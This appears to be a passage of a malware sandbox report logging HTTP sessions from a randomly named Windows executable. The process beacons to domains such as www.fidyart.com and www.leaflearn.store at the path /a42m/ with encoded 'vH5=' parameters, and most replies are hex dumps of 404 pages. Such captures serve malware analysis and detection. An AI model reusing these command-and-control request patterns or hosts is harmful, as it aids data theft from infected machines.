                          Data Ascii: vH5=eTyY4b+TjCck7WV1x/qCcJu317qJaAfgGs2Y03kMWn5z66G9F8FkhJFiuizor28yjl6oOCc3LI27EhO52gKOgETll43ONzkIi73Q5NJxxIz5f+01DQaKpripESumUqpaDyg/6u3AuLFDF639sJAww19vXCH5yWP43VRkQlEPui9Qrg2VCeq2zkpT000V0ky/qpobR+Cs0MHsA7VhGn6wOtL8Dd231pGDcx3lua/feOivlJVdyLY0s7BcFlmBetiWZQD4hmTCKWpXp2EGe054OYRUmGfEr2ZzoW+NRSF133gtvJjCzTS4nR48YL5PScYfFLGZTQgdx+PoikJbscA6ZuN55BySZQ1Nm1W4EqFL234/NcXFcrl0Ize+Y1Wf3PW2Ct0dINCElSccQgEMEuAz6CX2TLARkpv9RigyMKToy9lB5NaF0aoUi8NBs0fH3cEu+eUJmZD245S2qN2P4tg0E41DjRU2XT8eJsVOn0Ak+DYHqOC5Zeyzhq1n0EFAZB720bG5qsUoQzJZxloiEPum8covlcArBwLQaXl4VB+zAscV5LRMDmhdIF0z9H5TWfHJrYyENqccKHrwHPGrviIJJLhqLs8LBDCMsKyQXaqrzMk3p23NBOieHzZq+KFdZ2ALXOQYUsXM7g3vBQaEbDK52uj02Tdk/hr7uYykuLJ++LynSsmf1eV6Eu0TCeynRHPTjkodtndNl3/+Jsiw3ZxAqeGqzVCUC+/yS86Q+iHZ31RAoCAC3JYI6UQpgRPBPdJaoM6o+eVohrxd1lYfsj9v+jGMO3t1gsomOVkNeQrcpFm1wIkoVg+KzyKA4ZE6m9xKpk4AMgpDAMumAJeGY/dTNBwJ1xwJjSUxKucNoT5eTvUPPVH6AoMJmnulX4gWSJ2DebzDRhY3EHRtJdxJARnDU237SaSCyIcivhDOHj508nLYCF+u29SNHKI+iA3yWoxpAxg582j78Cym9bz1hdFAXhT+7J0mLHZGn9kcr1T1ei0GbYXX [TRUNCATED]
                          May 23, 2024 15:17:57.665044069 CEST1236INHTTP/1.1 404 Not Found
                          content-type: text/html
                          date: Thu, 23 May 2024 13:17:57 GMT
                          transfer-encoding: chunked
                          connection: close
                          Data Raw: 33 46 42 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 [TRUNCATED]
                          Data Ascii: 3FBA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihASgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C [TRUNCATED]
                          May 23, 2024 15:17:57.665241003 CEST224INData Raw: 62 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c 59 42 53 38 72 77 73
                          Data Ascii: biJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4
                          May 23, 2024 15:17:57.665390015 CEST1236INData Raw: 69 45 30 32 50 79 78 41 53 33 39 4e 5a 63 5a 39 6f 43 44 4b 35 34 2f 41 7a 6e 37 44 2b 35 41 68 66 62 54 70 79 49 6d 79 36 75 74 67 41 45 67 4d 6c 6d 72 79 35 51 6f 66 31 4e 4f 52 6b 4a 49 4a 67 6f 4f 51 46 4d 4f 52 6b 4a 73 43 69 38 65 43 2f 32
                          Data Ascii: iE02PyxAS39NZcZ9oCDK54/Azn7D+5AhfbTpyImy6utgAEgMlmry5Qof1NORkJIJgoOQFMORkJsCi8eC/23d2Fvqpe4xMX4uTV3+5nJMC+hga8tFRv2ANNb129McFJn4WRAASjWOj10lgNeGKCi37y1MNYgFjTxpN4pv6xGax/vYgDcTGNaCwAAeK9/UumwH71y5eD0YsRO/nwrq2f4/wme1sR612xVVtuzgdvcgRU726rrf73M
                          May 23, 2024 15:17:57.665714979 CEST1236INData Raw: 4b 2b 59 47 79 64 6d 30 2b 6d 6a 59 63 43 6b 77 4c 77 59 46 44 72 32 53 4a 75 77 58 57 45 6d 52 6e 54 35 44 78 76 41 5a 4a 66 61 73 76 45 36 39 34 6d 70 55 6d 4b 58 64 5a 47 68 46 70 53 39 61 35 4a 61 36 34 4b 2f 58 41 44 5a 6a 35 66 69 56 73 51
                          Data Ascii: K+YGydm0+mjYcCkwLwYFDr2SJuwXWEmRnT5DxvAZJfasvE694mpUmKXdZGhFpS9a5Ja64K/XADZj5fiVsQeQnwpFLi1GD0TVwRrX0D5+IFi4BVOrVZNqeSMAmbODjZvbYZT4K17S9Vj7LhtzHrr/YKlvTj/NjGxuYFT3Iu7f0okac7Wo9gJP3J3p6rjlVhZwWruneg6YGhXL5O9pwChPdsvUiM8QYlxHdC8VEm1VzJ5FIsgffR0
                          May 23, 2024 15:17:57.665728092 CEST1236INData Raw: 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66
                          Data Ascii: 66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6
                          May 23, 2024 15:17:57.666091919 CEST1236INData Raw: 75 4a 4d 6e 55 51 5a 42 4e 64 4c 77 66 56 4b 70 36 74 75 36 2f 73 44 6c 74 44 36 69 51 38 59 4f 58 73 66 7a 6f 2f 59 6a 4f 6c 56 75 69 57 59 57 6f 7a 47 78 51 44 41 67 62 4e 6b 57 52 70 2f 55 68 64 69 6d 63 58 4a 47 7a 76 2b 48 72 46 50 72 67 49
                          Data Ascii: uJMnUQZBNdLwfVKp6tu6/sDltD6iQ8YOXsfzo/YjOlVuiWYWozGxQDAgbNkWRp/UhdimcXJGzv+HrFPrgIBJt4qjX19sQTliUBZEDmnBMB6+i2UmPZtbbHSp1zPrtj43aQAVJkRLPsn7qWDxSIxXTiUI+Vq4ScnQeuE1sXxRHQv7qWCfu5q4RW7RLJfBgORpUMrNwxY2BM7wdQZGWprItdzwbdbDr+XknKi3OzJU25pI8CebKRj
                          May 23, 2024 15:17:57.666105032 CEST1236INData Raw: 76 4f 5a 38 2b 56 6f 66 43 31 58 61 69 6d 65 43 6c 38 4a 4d 57 5a 68 6a 69 68 48 2b 41 48 38 4d 75 76 48 72 38 45 6a 54 4b 67 39 77 55 44 5a 70 30 4f 33 50 75 62 58 4a 47 62 42 4a 30 74 36 72 7a 65 65 47 46 76 42 4a 46 38 47 7a 41 58 41 6e 49 55
                          Data Ascii: vOZ8+VofC1XaimeCl8JMWZhjihH+AH8MuvHr8EjTKg9wUDZp0O3PubXJGbBJ0t6rzeeGFvBJF8GzAXAnIU9IZZidQ5c+vFU+GvF+V5REdox0vDYb2mds5z8H75k4O/8/I4PAAAAAElFTkSuQmCC"> <link rel="icon" type="image/x-icon" href="data:image/x-icon;base64,AAABAAEAEBAAAAEAIABo
                          May 23, 2024 15:17:57.666115999 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 53 51 43 35 74 6f 6c 52 44 2f 5a 49 38 51 2f 32 53 50 45 50 39 6b 6a 78 44 2f 5a 49 38 51 2f 32 53 50 45 50 39 6b 6a 78 44 2f 5a 35 51 51 2f 32 4f 52 44 71 45 41 41 41 41
                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAGSQC5tolRD/ZI8Q/2SPEP9kjxD/ZI8Q/2SPEP9kjxD/Z5QQ/2ORDqEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABijwx3aJUQ/2SPEP9kjxD/ZI8Q/2SPEP9kjxD/ZI8Q/2iVEP9ljQ5+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY4gAKWWRDe1mkxH/ZI8Q/2SPEP9kjxD/ZI8Q/2aTEf9mkg7w
                          May 23, 2024 15:17:57.666891098 CEST1236INData Raw: 39 64 31 4f 6c 6f 59 42 67 2b 59 44 57 2b 2b 66 58 50 74 34 6b 6b 4e 6f 5a 71 6f 61 79 44 4b 67 6a 46 73 50 52 72 4b 79 6a 69 74 50 76 76 7a 54 73 78 2f 50 62 35 2b 5a 39 30 55 64 6f 6c 68 54 39 32 53 53 79 47 4a 65 79 64 42 49 4c 4b 72 36 2f 59
                          Data Ascii: 9d1OloYBg+YDW++fXPt4kkNoZqoayDKgjFsPRrKyjitPvvzTsx/Pb5+Z90UdolhT92SSyGJeydBILKr6/Ynf5nt394lPiJSIiAErLGRRZq+SGVHLCtbR8Hj94j6SWdGzzuQy7uwrGwC3FWqRmiNQVBw4QEVBREBkK1NAxpSp4iYnOXauXWra0uo6G/OsbFypbfs/ya5rzHHl2TSn0uX3t03puNetve3hGHLdU8727v8v5rGxeXb
                          May 23, 2024 15:17:57.669709921 CEST1236INData Raw: 57 71 2b 47 6d 6b 30 68 79 69 47 6d 6f 6e 50 6c 57 68 71 50 59 2b 58 53 4c 6a 71 58 4c 73 71 63 79 39 4a 46 34 36 4a 79 55 62 72 6f 55 32 7a 72 35 65 48 2f 31 2b 70 66 32 33 76 31 71 68 2f 41 6a 6f 72 38 56 7a 35 5a 77 67 31 38 55 44 35 43 31 64
                          Data Ascii: Wq+Gmk0hyiGmonPlWhqPY+XSLjqXLsqcy9JF46JyUbroU2zr5eH/1+pf23v1qh/Ajor8Vz5Zwg18UD5C1dzpeS9navVHVenVAb6/Q50J1ZpPAx/YAvkQ6sqEJoiK0fkYD6wAjY+RkdERUkaYEP96xj/QET4AXJrFmyXzYlORiY9wsJQH/u9VznkUe8+u6AdL0o2YMbZgqTYnTqCecklq2HuX9lLrnNYeb4VfAPqtoDB2Hq12bK/
                          May 23, 2024 15:17:57.670315027 CEST1236INData Raw: 73 77 6e 51 39 70 44 76 71 51 42 6f 78 62 50 4b 66 52 65 2b 66 67 30 46 50 41 63 75 4e 31 42 58 69 4e 6b 49 4b 67 56 4e 68 64 4c 41 70 47 4e 78 74 47 58 6c 6b 51 77 6e 65 78 67 68 59 38 33 6a 72 44 65 6d 39 75 39 57 6b 51 46 4a 70 6a 50 56 38 72
                          Data Ascii: swnQ9pDvqQBoxbPKfRe+fg0FPAcuN1BXiNkIKgVNhdLApGNxtGXlkQwnexghY83jrDem9u9WkQFJpjPV8rEBjqBRGH04c3gu0hnkT6GYoWbQHPRevxXTydKF7ugZ052ituN/bP2wAcQg1RDFQx6hypg2kYz3v9fpHgf0TFShhoaWLtlY7BycXPlThEe8fOGXgKk0jZgxa66Ea4vMIppi4hKSUpGWjKycvIL1tFHblh17X5wvUXv


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.55366963.250.43.147807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:59.603785038 CEST481OUTGET /a42m/?vH5=TRa47sC0zg9DwlJApIa9TKXT0LmdSyPROaHr8XI2UWJs85O5KJ5vgIdD5G7YtksjxwnhYTkQf9KJFjTFonbd3AHZxsuWNHNjjLjlx6sM8JLXfuIwaQjmht/eByOeQ7cAZg==&R0nl4=f64p HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.fidyart.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:18:00.206727982 CEST1236INHTTP/1.1 404 Not Found
                          content-type: text/html
                          date: Thu, 23 May 2024 13:18:00 GMT
                          transfer-encoding: chunked
                          connection: close
                          Data Raw: 46 46 41 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 a6 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 [TRUNCATED]
                          Data Ascii: FFA<!doctype html><html class="no-js" lang=""><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>Website not found</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAYAAACqaXHeAAAAAXNSR0IArs4c6QAACHhJREFUeAHdW2lsHEUWrqqZsT3j2FmbHBxBXsyGsAsCCRIRgjicA2JHRAtEQtHCj2i1ihASgnCEOFnEj9jhNAgpIC7xA6RoEYeIiB0WEgdLiYSSrATi2JBsIBAMPmIndjzjeDxV+73xtNUz7unpqukZj+gfrup6r973va+rq2q625wV+Ljw0KuRod5Ti5RSSxRnixRjczhjNYCtUUxRyTjjgygGYRuErZcrdpBzfqB6znkHuxeuj5JPoQ7g+X9ce+jV0H/7BtZIJe9nTF3HFAsaoXA2Dnm+EFxsv3x27XuHF66PG8Vx6eSrAH/sfKuiL9r9EK7k/bi6F7ngapswSn4B2e0X8Kq2Y00PnNMOkKWDbwJUdTy9ICHj/0LyV2fB8qUZhL8MiNDdw40bj/gRUPgRpLJ929/G1fjhQidPXAmDsAjTD+55j4BIR+tqJeWHIOOLmBpJSS7EHdHG5p0afaa45iVAZUfLVVKp/bgsM6ZELkYDZ2cF5zeMNG7+yhTO+KrNO9AWllLtnLbkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C9 [TRUNCATED]
                          May 23, 2024 15:18:00.206752062 CEST1236INData Raw: 69 4a 59 56 4e 52 6a 38 36 63 53 4a 75 75 6a 32 31 42 66 6a 70 35 32 50 58 41 53 53 69 43 31 51 45 2f 30 69 4b 6d 78 61 55 74 67 41 4a 79 57 37 55 51 69 69 69 73 77 6b 33 62 51 47 51 54 30 6e 4d 2f 46 6c 30 31 65 61 6d 4c 59 42 53 38 72 77 73 34
                          Data Ascii: iJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebMJNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4iE02PyxAS39NZcZ9oCDK
                          May 23, 2024 15:18:00.207036018 CEST448INData Raw: 47 59 32 67 4d 49 39 55 4c 67 58 34 57 67 75 31 44 75 55 63 79 39 51 6f 45 75 4d 76 71 36 31 70 79 48 67 2b 4a 38 50 6e 6b 45 35 66 52 48 73 54 31 39 44 38 46 45 4f 42 39 77 66 68 39 53 47 7a 5a 42 43 64 31 4d 61 37 6a 48 4b 56 59 4c 5a 49 5a 41
                          Data Ascii: GY2gMI9ULgX4Wgu1DuUcy9QoEuMvq61pyHg+J8PnkE5fRHsT19D8FEOB9wfh9SGzZBCd1Ma7jHKVYLZIZAsc+xDpOnLDj7xxZvrnHjUdOAdw6220zP9tWP3YucRRtabeV3Setztm+WNOWBmoLt2/tBOlb0uzZT2RZeWD+meWbaPOW9+GNrAeY+JjcDDfP8fAYe5cVFu/02q26h1KksDy45nbxTNgtVHK+YGydm0+mjYcCkwLwYF
                          May 23, 2024 15:18:00.207200050 CEST1236INData Raw: 43 38 56 45 6d 31 56 7a 4a 35 46 49 73 67 66 66 52 30 75 4d 55 31 4b 31 4e 42 41 4b 4e 49 79 73 33 37 58 62 79 71 64 79 39 62 61 56 4d 4a 44 71 63 62 47 35 74 79 53 56 5a 73 5a 63 46 44 33 54 69 57 58 32 50 35 4b 71 43 53 2f 6c 6e 57 61 59 36 59
                          Data Ascii: C8VEm1VzJ5FIsgffR0uMU1K1NBAKNIys37Xbyqdy9baVMJDqcbG5tySVZsZcFD3TiWX2P5KqCS/lnWaY6Y8u2/OLa181I//Q42NP3LXzq3Py82/g7sVWb73XzD+9qeRvi3uPmo2E7UTN39l/c/vnS9f4509N/A8B8Sp4dDZbzB3ORT/nQfsKPo+5M/4Drl+2uAmCHNc8PFrhPu8tF4Nbh5c2ncsUjH/KlPrl8PdmVdM3BVQAY9+
                          May 23, 2024 15:18:00.207214117 CEST224INData Raw: 62 6b 4b 57 4d 49 54 78 79 49 53 39 45 46 4f 48 55 36 75 68 36 67 64 61 62 41 50 76 61 72 53 33 45 78 43 6d 6c 30 43 39 42 79 31 78 76 72 50 6f 37 4e 7a 51 56 47 71 44 35 33 77 71 62 70 31 7a 6e 68 43 2b 74 2f 62 46 67 33 0d 0a 33 46 43 30 0d 0a
                          Data Ascii: bkKWMITxyIS9EFOHU6uh6gdabAPvarS3ExCml0C9By1xvrPo7NzQVGqD53wqbp1znhC+t/bFg33FC0qhva6BbojXb/vVSSp4SJC3HSTZ78jQQA5F9NwArbx4yTtgBXfPNuGdbiJYVNRj86cSJuuj21Bfjp52PXASSiC1QE/0iKmxaUtgAJyW7UQiiiswk3bQGQT0nM/Fl01eamLYBS8rws4NPebM
                          May 23, 2024 15:18:00.207492113 CEST1236INData Raw: 4a 4e 57 77 43 73 75 62 4f 6d 50 64 4d 73 42 45 79 34 61 51 73 41 37 4a 49 64 41 53 62 63 54 41 52 49 5a 4c 6b 41 70 64 43 73 7a 55 31 66 41 4d 56 36 53 79 46 54 52 77 34 47 33 50 51 46 59 4b 7a 50 45 62 77 30 47 72 57 35 61 51 75 41 48 5a 63 32
                          Data Ascii: JNWwCsubOmPdMsBEy4aQsA7JIdASbcTARIZLkApdCszU1fAMV6SyFTRw4G3PQFYKzPEbw0GrW5aQuAHZc2SLG0MeGmLQAeQJTsLWDCTVsAxaQvDyMLMSpMuGkLUB4KduFZvfZsW4iE02PyxAS39NZcZ9oCDK54/Azn7D+5AhfbTpyImy6utgAEgMlmry5Qof1NORkJIJgoOQFMORkJsCi8eC/23d2Fvqpe4xMX4uTV3+5nJMC+h
                          May 23, 2024 15:18:00.207506895 CEST1236INData Raw: 70 4f 6e 4c 44 6a 37 78 78 5a 76 72 6e 48 6a 55 64 4f 41 64 77 36 32 32 30 7a 50 39 74 57 50 33 59 75 63 52 52 74 61 62 65 56 33 53 65 74 7a 74 6d 2b 57 4e 4f 57 42 6d 6f 4c 74 32 2f 74 42 4f 6c 62 30 75 7a 5a 54 32 52 5a 65 57 44 2b 6d 65 57 62
                          Data Ascii: pOnLDj7xxZvrnHjUdOAdw6220zP9tWP3YucRRtabeV3Setztm+WNOWBmoLt2/tBOlb0uzZT2RZeWD+meWbaPOW9+GNrAeY+JjcDDfP8fAYe5cVFu/02q26h1KksDy45nbxTNgtVHK+YGydm0+mjYcCkwLwYFDr2SJuwXWEmRnT5DxvAZJfasvE694mpUmKXdZGhFpS9a5Ja64K/XADZj5fiVsQeQnwpFLi1GD0TVwRrX0D5+IFi
                          May 23, 2024 15:18:00.209445953 CEST1236INData Raw: 45 4c 68 57 61 54 44 76 6c 6f 6c 52 44 2f 61 5a 63 51 2f 32 61 50 44 71 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 49 4d 41 48 57 47 4a 43 44 39 6a 6a 51 76 43 5a 35 4d 52 2f 32 65 54 45 66 39 6a 6a 51 70 49 59 6f 77 44
                          Data Ascii: ELhWaTDvlolRD/aZcQ/2aPDqAAAAAAAAAAAAAAAAAAAAAAYIMAHWGJCD9jjQvCZ5MR/2eTEf9jjQpIYowDQ2WSDv1nlBH/Y44Mxl6NA0FmiAAeAAAAAAAAAAAAAAAAAAAAAFyLCxZfkQUzYo4FW2WQDvNolRD/ZJAPqmOQDKZolRD/ZJEM9WCQCl9kkQUzVYoKGAAAAAAAAAAAAAAAAGOSDmdmkg7nZ5MR/2SQDvFijgz7ZJAP/
                          May 23, 2024 15:18:00.209461927 CEST1236INData Raw: 47 44 41 41 44 78 6a 77 41 41 2b 42 38 41 41 4d 41 44 41 41 43 41 41 51 41 41 75 42 30 41 41 50 41 50 41 41 44 77 44 77 41 41 38 41 38 41 41 4f 41 48 41 41 44 67 42 77 41 41 38 41 38 41 41 50 41 50 41 41 44 34 48 77 41 41 2f 6e 38 41 41 41 3d 3d
                          Data Ascii: GDAADxjwAA+B8AAMADAACAAQAAuB0AAPAPAADwDwAA8A8AAOAHAADgBwAA8A8AAPAPAAD4HwAA/n8AAA==" /> <style> @font-face { font-family: 'InteloLocal'; src: url(data:application/font-woff2;charset=utf-8;base64,d09GMgABAAAA
                          May 23, 2024 15:18:00.211493015 CEST1236INData Raw: 69 73 42 6f 4e 43 32 4e 76 44 51 53 66 6b 67 4a 50 45 33 56 61 50 58 2b 62 6c 50 6c 69 78 2b 45 68 74 49 4a 70 46 4a 5a 73 6d 57 48 58 2b 69 49 2b 6a 43 4a 66 52 70 37 37 67 6f 55 36 65 2f 53 56 46 64 6c 36 6f 4e 6c 78 6d 59 5a 38 68 35 46 48 34
                          Data Ascii: isBoNC2NvDQSfkgJPE3VaPX+blPlix+EhtIJpFJZsmWHX+iI+jCJfRp77goU6e/SVFdl6oNlxmYZ8h5FH4nQMD//+qsvhzLLMWyHXB4RqElDvltvIBcAnBJfQ4p7rY7wHKbinM+TF6mNapwGdlJ6FpwA9Sg+LrbAgME/yf+N606iaPJQ6OUdtlSoQQCIVWidSTxGpMTVhV9+TvBjnNMKkFjhuhwDMMwRHQtJxpO3O+1/c9Oj0mQ
                          May 23, 2024 15:18:00.212028980 CEST1236INData Raw: 47 79 6a 62 74 52 6c 41 56 75 69 52 51 4c 2f 2f 35 79 76 73 44 74 7a 61 4e 54 6b 68 50 71 55 36 59 39 4b 45 52 63 77 53 53 6b 64 41 51 63 4b 39 37 36 58 39 4f 63 56 68 6b 78 79 78 67 48 70 57 64 52 7a 73 35 4e 6a 57 57 50 31 34 48 4d 6d 76 58 6b
                          Data Ascii: GyjbtRlAVuiRQL//5yvsDtzaNTkhPqU6Y9KERcwSSkdAQcK976X9OcVhkxyxgHpWdRzs5NjWWP14HMmvXkjfnLJUsKwiF/hBmOET6ea8zP//FrS/177Svqyd2nGGCGEMIMYhK/sxPcN2Vu6u0u4PEooJYQSgjFGCCOMECIEY0rfZ1vu8xgu/o8JuihXeSrMV/ljfj+tHurEHUmZnqodBQGVZtn6vX9sgnc/Y+rTtzXtdd9abWIE


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.55367089.31.143.90807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:18:06.214078903 CEST753OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.leaflearn.store
                          Origin: http://www.leaflearn.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.leaflearn.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 6e 2b 65 4f 6a 49 74 48 38 52 45 78 30 67 65 56 7a 57 75 32 74 4c 50 4d 4b 69 65 56 74 6c 69 46 70 6f 50 59 67 59 76 76 6e 2f 6e 47 30 77 6f 66 4c 61 68 68 49 6c 73 71 49 48 4e 53 32 42 6f 71 45 73 63 5a 53 34 33 6b 64 34 48 46 59 6b 38 35 39 6d 50 44 47 78 7a 34 7a 6f 41 79 74 44 6b 56 55 32 78 70 5a 65 63 44 61 36 71 77 48 62 6b 2f 6c 30 55 62 42 76 56 33 67 55 69 6a 52 4c 68 45 74 78 2b 54 30 71 7a 74 51 48 7a 2f 75 70 38 45 34 42 78 68 46 4b 70 75 54 6c 44 5a 2b 6b 52 2b 4e 6f 6b 42 38 4b 54 4d 42 2f 70 78 4d 76 44 45 58 4f 50 31 32 66 76 42 32 4c 77 31 6c 75 43 55 42 4e 4e 6e 73 57 67 3d
                          Data Ascii: vH5=n+eOjItH8REx0geVzWu2tLPMKieVtliFpoPYgYvvn/nG0wofLahhIlsqIHNS2BoqEscZS43kd4HFYk859mPDGxz4zoAytDkVU2xpZecDa6qwHbk/l0UbBvV3gUijRLhEtx+T0qztQHz/up8E4BxhFKpuTlDZ+kR+NokB8KTMB/pxMvDEXOP12fvB2Lw1luCUBNNnsWg=
